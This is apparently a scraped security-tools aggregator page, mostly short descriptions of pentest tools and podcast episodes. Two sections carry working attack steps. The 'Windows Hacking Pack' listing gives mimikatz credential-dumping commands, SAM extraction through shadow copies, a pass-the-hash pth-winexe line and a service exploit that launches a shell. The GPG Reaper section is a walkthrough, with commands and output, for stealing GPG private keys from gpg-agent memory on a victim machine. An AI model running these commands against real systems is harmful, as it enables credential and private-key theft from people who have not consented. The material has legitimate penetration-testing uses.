Windows, Nintendo, and LinkedIN – Hack Naked News #170

This week, Apple and issues of trust, LinkedIN leaks, spending money on ransomware, dead fingerprints, mysterious medical hacks, and hacking the Nintendo switch with no patches even possible? Jason Wood from Paladin Security joins us for expert commentary, and more on this episode of Hack Naked News! Security News ‘iTunes Wi-Fi Sync’ Feature Could Let […]
The post Windows, Nintendo, and LinkedIN – Hack Naked News #170 appeared first on Security Weekly.


Cookiescanner – Tool For Check The Cookie Flag In Multiple Sites

Tool for checking the cookie flag in multiple sites.

Intro
Tool created to make it easier to check the cookie flag when analyzing multiple web servers. If you want to know why this tool could be useful, the original post links to an explanation.

Usage: [options]
Example: ./ -i ips.txt

Options:
  -h, --help                  show this help message and exit
  -i INPUT, --input=INPUT     File input with the list of webservers
  -u URL, --url=URL           URL
  -f FORMAT, --format=FORMAT  Output format (json, xml, csv, normal, grepable)
  -g GOOGLE, --google=GOOGLE  Search in google by domain
  --nocolor                   Disable color (for the normal format output)
  -I, --info                  More info

Performance:
  -t TIMEOUT                  Timeout of response
  -d DELAY                    Delay between requests

Requirements
requests >= 2.8.1
BeautifulSoup >= 4.2.1

Install requirements
pip3 install --upgrade -r requirements.txt

Author
Manuel Mancera

Download Cookiescanner


WHP – Microsoft Windows Hacking Pack

M$ Windows Hacking Pack
===========
Tools here are from different sources. The repo is generally licensed with WTFPL, but some content may not be (e.g. sysinternals).
"pes" means "PE Scrambled". It's useful sometimes.

Remote Exploits
===========
- Windows 2000 / XP SP1: MS05-039 Microsoft Plug and Play Service Overflow, works with SSDP too
- XP/NT (before SP2): MS03-026 Microsoft RPC DCOM Interface Overflow
- XP (SP2 and SP3) (can be used also for priv esc): MS08-067 Remote Stack Overflow Vulnerability Exploit (srvsvc)
- Windows 7 and Server 2008 R2 (x64), all Service Packs: MS17-010 aka "Eternal Blue"
- Server 2016 (DoS, may lead to exec): "Fuzzing SMB" video, showing the crash

Privilege Escalation
===========
First, if you have meterpreter, it may be a good idea to try "getsystem".

srvcheck3.exe
=====
Privilege escalation for Windows XP SP2 and before. This can exploit vulnerable services.
srvcheck3.exe -m upnphost -H -c "cmd.exe /c c:\Inetpub\wwwroot\shell.exe"

KiTrap0D.tar
=====
Privilege escalation for Microsoft Windows NT/2000/XP/2003/Vista/2008/7
MS10-015 / CVE-2010-0232

Ways of exploits listed
=====
- XP SP2 (and before): srvcheck3.exe – upnp service or SSDPSRV service
- Windows XP/2003: MS11-080 → Local Privilege Escalation Exploit Afd.sys
- Vista/7: CVE-2010-4398 Elevation of Privileges (UAC Bypass)
- 8.1 (and before): MS14-058 → TrackPopupMenu Privilege Escalation
- 8.1 (and before): MS15-051 Win32k LPE vulnerability used in APT attack "taihou32"
- NT/2K/XP/2K3/Vista/2K8/7/8: KiTrap0D – EPATHOBJ Local Ring Exploit
- 10 (and before): Hot Potato (nbns spoof + wpad + smb ntlm)
- 10 (and before): Link/URL based exploitation of NetNTLM hashes, e.g. sending a link file in email or dropping it on a file share. The technique is presented in the linked write-up.
- XP (and after): .lnk exploit for receiving NetNTLM hashes remotely.

Files that may contain the SAM:
- Windows/system32/config/SAM
- /WINDOWS/repair/SAM
- regedit.exe: HKEY_LOCAL_MACHINE -> SAM
Tools to get the SAM database if locked: pwdump, samdump, samdump2, Cain&Abel. Otherwise just copy it.

Dump SAM through shadow volume: if a shadow copy can be created, the database can be copied from it.
Vista command: vssadmin create shadow
Server 2008 command: diskshadow

Windows Credentials Editor: WCE can recover password hashes from LSASS – supports Windows XP, Windows 2003, Vista, Windows 7 and Windows 2008 (all SPs, 32bit and 64bit versions).

Mimikatz dumping:
mimikatz # privilege::debug
mimikatz # sekurlsa::logonpasswords
mimikatz # lsadump::sam

Cachedump aka in-memory attacks for SAM hashes / Cached Domain Credentials: fgdump.exe (contains pwdump and cachedump, can read from memory).

SAM dump (hive): "A hive is a logical group of keys, subkeys, and values in the registry that has a set of supporting files containing backups of its data."

Dump SAM, then spray hashes: keimpx (try hashes with different users, against domain accounts).

Dumping (memory) / Windows 2000, Windows 95, Windows 98, Windows Me, Windows NT, Windows XP: LSAdump2, LSASecretsDump, pwdumpx, gsecdump or Cain & Abel (before Windows 8.1).

pth-winexe --user=pc.local/Administrator%aad3b435b51404eeaad3b435b514t234e:1321ae011e02ab0k26e4edc5012deac8 // cmd

PassTheTicket (Kerberos): mimikatz can do it.

Duplicate Access Tokens (if an admin access token can be used, it's a win) "Kidnapping": MS 09-12, Churrasco.bin shell.bin (runs shell.bin with nt system authority).

Other notable tools: psexec, smbshell, metasploit's psexec, etc. Also listed is a tool that allows visualizing connections in an AD domain and finding fast escalation ways.

To Be Added
===========
- --> Stuff for dumping passwords
- openvpn
- evilgrade

Hashes (SHA256) and VirusTotal scans
===========

Download WHP


JCS – Joomla Vulnerability Component Scanner

JCS (Joomla Component Scanner) is made for penetration testing on Joomla CMS. JCS can help you with the latest component vulnerabilities and exploits. The database can be updated from several resources, and a crawler has been implemented to find components and component links. This version supports Exploitdb and Packetstorm vulnerabilities to create a database for Joomla components. JCS can also create a report in HTML for you.

Features:
- Multi-thread
- Delay between requests
- Custom HTTP headers
- Supports HTTP proxy
- Supports HTTP authentication: BASIC, DIGEST
- Component crawler based on regex pattern
- Component page identification by: page comparison, regex pattern, searching in HTML tags (example: "not found</title>"), checking HTTP status code

Report sample: (screenshot)

Download JCS


PenCrawLer – An Advanced Web Crawler And DirBuster

PeNCrawLer is an advanced web crawler and dirbuster designed for use in penetration testing, based on Windows OS.

Web Crawler Features:
- Follow redirects
- Rendering JavaScript
- Extract links from custom HTML elements
- Extract links with regex pattern
- Black-list extensions
- White-list extensions
- Download files from white-list extensions
- Setting up a limit for crawling similar links
- Searching for string in: URL, Response
- Automatic form submission
- Support HTTP proxy
- Supported authentication: Basic, Digest
- Throttling mode

DirBuster Features:
- Dictionary attack
- Bruteforce attack
- Custom bruteforce charset
- Custom request method: GET only, Auto-switch (GET and HEAD)
- Recursive mode
- Bruteforce directories
- Bruteforce files with custom extensions
- Automatic page detection by: failure status code, success status code, regex pattern, HTML source

Download PenCrawLer


Windows, MacOS, & Javascript – Application Security Weekly #12

In the news, Attacking an FTP Client: MGETting more than you bargained for, Warning: Your Windows PC can get hacked by just visiting a site, new MacOS backdoor linked to OceanLotus, & more on this episode of Application Security Weekly!
Full Show Notes
Visit our website. Follow us on Twitter: https://www.twitter.comsecurityweekly
The post Windows, MacOS, & Javascript – Application Security Weekly #12 appeared first on Security Weekly.


Sandcat Browser 6.0 – Pentest And Developer-Oriented Web Browser

Sandcat is a lightweight multi-tabbed web browser that combines the speed and power of Chromium and Lua. Sandcat comes with built-in live headers, an extensible user interface and command line console, resource viewer, and many other features that are useful for web developers and pen-testers and when you need to examine live web applications. For more details, see the docs directory and the credits section below for a few more details about the Sandcat architecture.

Directories
/docs – Lua API documentation
/packs – contents of uncompressed pack files
  /Common – common CSS, widgets and scripts package (Common.pak)
  /Resources – resources package (Resources.pak)
/src – the main executable source and built-in resource files
  /core – user interface source
  /html – user interface resources (HTML)
  /lua – Lua API source

Download
Compiled binaries for Windows can be downloaded from the links below.
- 6.0 64-bit
- 6.0 32-bit
- 6.0 32-bit with Pen-Tester Tools (included as part of Syhunt Community)

Compiling
For compiling Sandcat, you will just need Catarinka and pLua. The entire Sandcat user interface is created during runtime, so there is no need to install third-party components in the IDE – you can just add the dependencies listed above to the library path and hit compile. It compiles under Delphi 10 Seattle down to XE2. If you are trying to compile it with Lazarus, let me know which errors you get – I will try to do the same soon. Some work is still needed before a Mac or Linux version materializes.

ChangeLog
- Request Viewer rewrite – with better display of requests and stability fixes.
- Disabled Chromium's XSS protection when in pentest mode.
- Simplified the tabbed UI – major tab code clean up and reorganization.
- Added drag and drop for items in the list editor.
- Fixed: occasional crash when an extension called events of Lua objects.
- Additional stability.

Contact
Twitter: @felipedaragon, @syhunt
Email: felipe at syhunt.com
If you want to report a security bug, please see the docs\ file.

Download Sandcat Browser 6.0


GPG Reaper – Obtain/Steal/Restore GPG Private Keys From Gpg-Agent Cache/Memory

Obtain/Steal/Restore GPG Private Keys from gpg-agent cache/memory

This POC demonstrates a method for obtaining GPG private keys from gpg-agent memory under Windows. Normally this should be possible only within a 10 minute time frame (the --default-cache-ttl value). Unfortunately the housekeeping() function (which is responsible for cache cleanup) is executed only if you are using GPG (there is no timer). This means that in a normal GPG use case, such as signing a file, then closing the GUI and doing other tasks, your password is still in gpg-agent memory (even if the ttl has expired). An attacker who has access to your current session can use this to steal the private key without knowing your passphrase.

Installation
pip install PGPy
If you get:
TypeError: Error when calling the metaclass bases metaclass conflict: the metaclass of a derived class must be a (non-strict) subclass of the metaclasses of all its bases
when running the python script, then:
pip install six==1.10.0

Test
1. Install Gpg4Win 3.0.3
2. Open a command line and start the agent with a 2 second cache time:
cd c:\Program Files (x86)\GnuPG\bin
taskkill /im gpg-agent.exe /F
gpg-agent.exe --daemon --default-cache-ttl 2
3. Run Kleopatra and generate a new key pair
4. Sign some example test file
5. Pinentry will pop up and ask you for the passphrase
6. Repeat steps 4-5. Each time pinentry shows up because our 2 second cache expired
7. Run GPG reaper:
powershell -ExecutionPolicy Bypass -File Gpg-Reaper.ps1 -OutputFile testme.txt
You will see something like:
[+] Detect GPG version 3.0.3
[*] Readed jmp bytes: F6-05-E0-F9-45-00-04-0F-85
[*] Readed housekeeping bytes: 55
[+] Find sec key
[+] Check key grip:
[*] uid [ultimate] Adam Nowak <>
[+] Found public key
[*] Allocate memory at: 2d00000
[+] Read debug log C:\Users\user\AppData\Local\Temp\gpg_D98F5932C4193BF82B9C773F13899DD586A1DE38_KqALSXPH.txt
[+] Key dumped
[*] Kill background Job
[*] Restore bytes
As you can see, we dumped the key. This is possible because we nopped the housekeeping function.
8. Restore the private key:
python .\testme.txt
The private key is dumped to a file:
[+] Dump E057D86EE78A0EED070296C01BC8630ED9C841D0 – Adam Nowak <>

Introduction
GPG-Agent is a daemon to manage private keys independently from any protocol. The GUI interface communicates with the agent using the Assuan Protocol. By default the agent caches your credentials. The --default-cache-ttl n option sets the time a cache entry is valid to n seconds. The default is 600 seconds. Each time a cache entry is accessed, its timer is reset.
In the signing process under Windows, the crucial part is the housekeeping() function, which is responsible for removing expired credentials from memory. But there is one problem here: this function is executed only in two places (inside agent_put_cache and agent_get_cache). This means that cached credentials are NOT removed from memory until some gpg-agent command which uses agent_put_cache, agent_get_cache or agent_flush_cache is executed.

Usage
On the victim computer:
powershell -ExecutionPolicy Bypass -File Gpg-Reaper.ps1 -OutputFile out.txt
Transfer out.txt to your machine and restore the private keys from out.txt. Private keys will be dumped into separate files.
If GPG is installed outside the default directories:
Gpg-Reaper -GpgConnectAgentPath c:\gpg\gpg-connect-agent.exe -GpgAgentPath c:\gpg\gpg-agent.exe -GpgPath c:\gpg\gpg.exe
If you don't want debug messages:
Gpg-Reaper -Verbose $false

Post exploitation on a machine with GPG
Let's assume that you are doing penetration testing and you obtain a shell on a computer with GPG installed. If you are lucky and the user used GPG recently and the cache has not expired, you can:
1. Sign some file:
Run c:\Program Files (x86)\GnuPG\bin\gpg-connect-agent.exe
Get the list of keys available on the machine:
KEYINFO --list
S KEYINFO 38EA3CACAF3A914C5EC2D05F86CDBDCFE83077D2 D - - - P - - -
Set the keygrip and message hash:
SIGKEY 38EA3CACAF3A914C5EC2D05F86CDBDCFE83077D2
# SHA512 of the message
SETHASH 10 7bfa95a688924c47c7d22381f20cc926f524beacb13f84e203d4bd8cb6ba2fce81c57a5f059bf3d509926487bde925b3bcee0635e4f7baeba054e5dba696b2bf
PKSIGN
2. Export the private key:
Run c:\Program Files (x86)\GnuPG\bin\gpg-connect-agent.exe
Get the wrapping key:
KEYWRAP_KEY --export
Export a secret key from the key store. The key will be encrypted using the current session's key wrapping key using the AESWRAP-128 algorithm:
EXPORT_KEY 38EA3CACAF3A914C5EC2D05F86CDBDCFE83077D2
Unfortunately this does not work as expected and asks for a password. Why? Because the cmd_export_key() function executes agent_key_from_file() with the CACHE_MODE_IGNORE flag, which means that the cache won't be used and the user is asked for the passphrase each time.

Bypass private key export restriction
We know that it's not possible to export a GPG key through gpg-agent without knowing the password. But there is a little quirk here. The agent has a few options available:
1. --debug-level
Select the debug level for investigating problems. level may be a numeric value or a keyword: guru – All of the debug messages you can get.
2. --log-file file
Append all logging output to file. This is very helpful in seeing what the agent actually does.
Let's run the agent using gpg-agent.exe --daemon --debug-level guru --log-file out.txt and sign some file.
2018-03-04 18:21:15 gpg-agent[7180] DBG: chan_0x0000008c <- SIGKEY 590A068768B6A5CB4DD81CD4828C72AD8427DFE4
2018-03-04 18:21:15 gpg-agent[7180] DBG: chan_0x0000008c -> OK
2018-03-04 18:21:15 gpg-agent[7180] DBG: chan_0x0000008c <- SETKEYDESC Please+enter+the+passphrase+to+unlock+the+OpenPGP+secret+key:%0A%22adam+nowak+<>%22%0A2048-bit+RSA+key,+ID+1308197BFDF95EAA,%0Acreated+2018-02-28.%0A
2018-03-04 18:21:15 gpg-agent[7180] DBG: chan_0x0000008c -> OK
2018-03-04 18:21:15 gpg-agent[7180] DBG: chan_0x0000008c <- SETHASH 8 B00357D0B85243BB34049E13FD5C328228BC53B317DF970594A1CED6CB89F4EA
2018-03-04 18:21:15 gpg-agent[7180] DBG: chan_0x0000008c -> OK
2018-03-04 18:21:15 gpg-agent[7180] DBG: chan_0x0000008c <- PKSIGN
2018-03-04 18:21:15 gpg-agent[7180] DBG: agent_get_cache '590A068768B6A5CB4DD81CD4828C72AD8427DFE4' (mode 2) ...
2018-03-04 18:21:15 gpg-agent[7180] DBG: ... miss
2018-03-04 18:21:15 gpg-agent[7180] starting a new PIN Entry
2018-03-04 18:21:15 gpg-agent[7180] DBG: connection to PIN entry established
2018-03-04 18:21:15 gpg-agent[7180] DBG: chan_0x0000008c -> INQUIRE PINENTRY_LAUNCHED 3736 qt 1.1.0 /dev/tty - -
2018-03-04 18:21:15 gpg-agent[7180] DBG: chan_0x0000008c <- END
2018-03-04 18:21:18 gpg-agent[7180] DBG: agent_put_cache '590A068768B6A5CB4DD81CD4828C72AD8427DFE4' (mode 2) requested ttl=0
2018-03-04 18:21:18 gpg-agent[7180] DBG: skey: (private-key
2018-03-04 18:21:18 gpg-agent[7180] DBG: (rsa
2018-03-04 18:21:18 gpg-agent[7180] DBG: (e #010001#)
2018-03-04 18:21:18 gpg-agent[7180] DBG: hash: (data
2018-03-04 18:21:18 gpg-agent[7180] DBG: (flags pkcs1)
2018-03-04 18:21:18 gpg-agent[7180] DBG: (hash sha256 #B00357D0B85243BB34049E13FD5C328228BC53B317DF970594A1CED6CB89F4EA#))
It looks like guru mode prints the n, e, d, p, q and u numbers to the log file. Knowing this we can calculate the public and private key. Internally the skey value is printed by gcry_log_debugsxp() when DBG_CRYPTO is set:
if (DBG_CRYPTO)
{
  gcry_log_debugsxp ("skey", s_skey);
  gcry_log_debugsxp ("hash", s_hash);
}

FAQ
Why PowerShell? Because this file can be run without any external dependencies on most modern Windows systems.
GPG %file% not exist: gpg-connect-agent.exe, gpg-agent.exe or gpg.exe does not exist in the default location. You can try to specify a custom location using:
Gpg-Reaper -GpgConnectAgentPath c:\gpg\gpg-connect-agent.exe -GpgAgentPath c:\gpg\gpg-agent.exe -GpgPath c:\gpg\gpg.exe
No gpg-agent running: gpg-agent.exe is not running on this system so we cannot restore the private key.
Unknown gpg-agent version, sha256: Currently this script supports only specific versions.
No cached key: There is no cached key in memory so we cannot restore the private key.

Attribution
Scythe icon made by Freepik. Of Suffering font by GraveTech.

Download GPG Reaper


Rp++ – Tool That Aims To Find ROP Sequences In PE/Elf/Mach-O X86/X64 Binaries

rp++ is a full-cpp written tool that aims to find ROP sequences in PE/Elf/Mach-O (doesn't support the FAT binaries) x86/x64 binaries. It is open-source, documented with Doxygen (well, I'm trying to..) and has been tested on several OS: Debian / Windows 7 / FreeBSD / Mac OSX Lion (10.7.3). Moreover, it is x64 compatible. I almost forgot, it handles both Intel and AT&T syntax (beloved BeaEngine). By the way, the tool is a standalone executable. You can build rp++ very easily with CMake; it will generate a project file for your preferred IDE. There are some other things you will be able to do with rp++, like finding hexadecimal values, or strings, etc.

Benchmark: Is it efficient?
Yeah, here are some benchmarks on Win7 x64, Intel i7 Q720 @ 1.6GHz, 4GB RAM:
- Target: ntoskrnl.exe x64 version 6.1.7601.17790
  D:\rp-win-x64.exe --file=ntoskrnl.exe --rop=8 > n
  ~80s for a total of 267356 gadgets found.
- Target: chrome.exe x86 version 18.0.1025.168
  D:\rp-win-x64.exe --file=chrome.exe --rop=8 > n
  ~13s for a total of 75459 gadgets found.
- Target: cmd.exe x86 version v6.1.7600
  D:\rp-win-x64.exe --file=cmd.exe --rop=8 > n
  ~15s for a total of 18818 gadgets found.
- Target: bash x86 version
  D:\rp-win-x64.exe --file=bash-x86 --rop=8 > n
  ~12s for a total of 45385 gadgets found.

Screenshots: rp++ on Win7 x64 / Debian Squeeze x64 / FreeBSD x64 / Mac OSX Lion x64

How to use it?
USAGE:
./rp++ [-hv] [-f <binary path>] [-i <1,2,3>] [-r <positive int>] [--raw=<archi>] [--atsyntax] [--unique] [--search-hexa=<\x90A\x90>] [--search-int=<int in hex>]
OPTIONS:
  -f, --file=<binary path>     give binary path
  -i, --info=<1,2,3>           display information about the binary header
  -r, --rop=<positive int>     find useful gadgets for your future exploits, arg is the gadget maximum size in instructions
  --raw=<archi>                find gadgets in a raw file, 'archi' must be in the following list: x86, x64
  --atsyntax                   enable the at&t syntax
  --unique                     display only unique gadgets
  --search-hexa=<\x90A\x90>    try to find hex values
  --search-int=<int in hex>    try to find a pointer on a specific integer value
  -h, --help                   print this help and exit
  -v, --version                print version information and exit

Where can I download standalone binaries?
There are x86 and x64 versions for Windows (compiled with VS 2010 on Win7 x64), Linux (compiled with gcc 4.4.5 on Debian x64 6.0.1), FreeBSD (compiled with gcc 4.2.1 on FreeBSD 8.2) and Mac OSX (compiled with gcc 4.2.1 on OSX 10.7.3; not statically linked). Here are the sha1sums:

Download Rp++


Libsodium – A Modern, Portable, Easy To Use Crypto Library

Sodium is a modern, easy-to-use software library for encryption, decryption, signatures, password hashing and more. It is a portable, cross-compilable, installable, packageable fork of NaCl, with a compatible API, and an extended API to improve usability even further. Its goal is to provide all of the core operations needed to build higher-level cryptographic tools. Sodium is cross-platform and cross-language. It runs on a variety of compilers and operating systems, including Windows (with MinGW or Visual Studio, x86 and x86_64), iOS and Android. JavaScript and WebAssembly versions are also available and are fully supported. Bindings for all common programming languages are available and well-supported. The design choices emphasize security and ease of use. But despite the emphasis on high security, primitives are faster across the board than most implementations.

Documentation
The documentation is available on Gitbook and built from the libsodium-doc repository:
- libsodium documentation – online, requires JavaScript.
- offline documentation in PDF, MOBI and ePUB formats.

Integrity Checking
The integrity checking instructions (including the signing key for libsodium) are available in the installation section of the documentation.

Download Libsodium
items)">Mobile Security</a> <a href="" class="tag-cloud-link tag-link-214 tag-link-position-20" style="font-size: 11.367088607595pt;" aria-label="Networking (175 items)">Networking</a> <a href="" class="tag-cloud-link tag-link-127 tag-link-position-21" style="font-size: 11.367088607595pt;" aria-label="News (176 items)">News</a> <a href="" class="tag-cloud-link tag-link-289 tag-link-position-22" style="font-size: 10.303797468354pt;" aria-label="Open Source (155 items)">Open Source</a> <a href="" class="tag-cloud-link tag-link-201 tag-link-position-23" style="font-size: 10.126582278481pt;" aria-label="Other (150 items)">Other</a> <a href="" class="tag-cloud-link tag-link-32 tag-link-position-24" style="font-size: 10.126582278481pt;" aria-label="Paul's Security Weekly (149 items)">Paul's Security Weekly</a> <a href="" class="tag-cloud-link tag-link-128 tag-link-position-25" style="font-size: 13.316455696203pt;" aria-label="paul asadoorian (228 items)">paul asadoorian</a> <a href="" class="tag-cloud-link tag-link-15 tag-link-position-26" style="font-size: 16.506329113924pt;" aria-label="Penetration Test (344 items)">Penetration Test</a> <a href="" class="tag-cloud-link tag-link-48 tag-link-position-27" style="font-size: 15.79746835443pt;" aria-label="Penetration Testing (317 items)">Penetration Testing</a> <a href="" class="tag-cloud-link tag-link-512 tag-link-position-28" style="font-size: 11.367088607595pt;" aria-label="powershell (178 items)">powershell</a> <a href="" class="tag-cloud-link tag-link-89 tag-link-position-29" style="font-size: 17.215189873418pt;" aria-label="Privacy (378 items)">Privacy</a> <a href="" class="tag-cloud-link tag-link-291 tag-link-position-30" style="font-size: 17.037974683544pt;" aria-label="Python (372 items)">Python</a> <a href="" class="tag-cloud-link tag-link-45 tag-link-position-31" style="font-size: 9.0632911392405pt;" aria-label="Python Script (130 items)">Python Script</a> <a href="" class="tag-cloud-link tag-link-2857 
tag-link-position-32" style="font-size: 20.405063291139pt;" aria-label="r/blackhat (568 items)">r/blackhat</a> <a href="" class="tag-cloud-link tag-link-637 tag-link-position-33" style="font-size: 11.189873417722pt;" aria-label="ransomware (173 items)">ransomware</a> <a href="" class="tag-cloud-link tag-link-292 tag-link-position-34" style="font-size: 8pt;" aria-label="Scan (114 items)">Scan</a> <a href="" class="tag-cloud-link tag-link-67 tag-link-position-35" style="font-size: 9.7721518987342pt;" aria-label="Scanner (144 items)">Scanner</a> <a href="" class="tag-cloud-link tag-link-34 tag-link-position-36" style="font-size: 15.974683544304pt;" aria-label="security (325 items)">security</a> <a href="" class="tag-cloud-link tag-link-40 tag-link-position-37" style="font-size: 9.2405063291139pt;" aria-label="Security Tools (133 items)">Security Tools</a> <a href="" class="tag-cloud-link tag-link-35 tag-link-position-38" style="font-size: 12.075949367089pt;" aria-label="security weekly (194 items)">security weekly</a> <a href="" class="tag-cloud-link tag-link-166 tag-link-position-39" style="font-size: 8.7088607594937pt;" aria-label="Tools (124 items)">Tools</a> <a href="" class="tag-cloud-link tag-link-51 tag-link-position-40" style="font-size: 15.79746835443pt;" aria-label="Uncategorized (315 items)">Uncategorized</a> <a href="" class="tag-cloud-link tag-link-76 tag-link-position-41" style="font-size: 22pt;" aria-label="Vulnerabilities (703 items)">Vulnerabilities</a> <a href="" class="tag-cloud-link tag-link-444 tag-link-position-42" style="font-size: 8.8860759493671pt;" aria-label="Vulnerability Scanner (127 items)">Vulnerability Scanner</a> <a href="" class="tag-cloud-link tag-link-14 tag-link-position-43" style="font-size: 17.569620253165pt;" aria-label="webapps (396 items)">webapps</a> <a href="" class="tag-cloud-link tag-link-90 tag-link-position-44" style="font-size: 17.746835443038pt;" aria-label="Web Security (409 items)">Web Security</a> <a href="" 
class="tag-cloud-link tag-link-71 tag-link-position-45" style="font-size: 17.392405063291pt;" aria-label="Windows (387 items)">Windows</a></div> </aside></div><!-- #secondary --> </div><!-- #content --> <footer id="colophon" class="site-footer" role="contentinfo"> <div class="scroll-container"> <a href="#" class="scrolltop"><i class="fa fa-chevron-up"></i></a> </div> <div class="site-info container"> <a href="" rel="nofollow">Proudly powered by WordPress</a><span class="sep"> | </span>Theme: <a href="" rel="nofollow">Amadeus</a> by Themeisle. </div><!-- .site-info --> </footer><!-- #colophon --> </div><!-- #page --> <script type='text/javascript' src=''></script> <script type='text/javascript' src=''></script> <script type='text/javascript' src=''></script> </body> </html>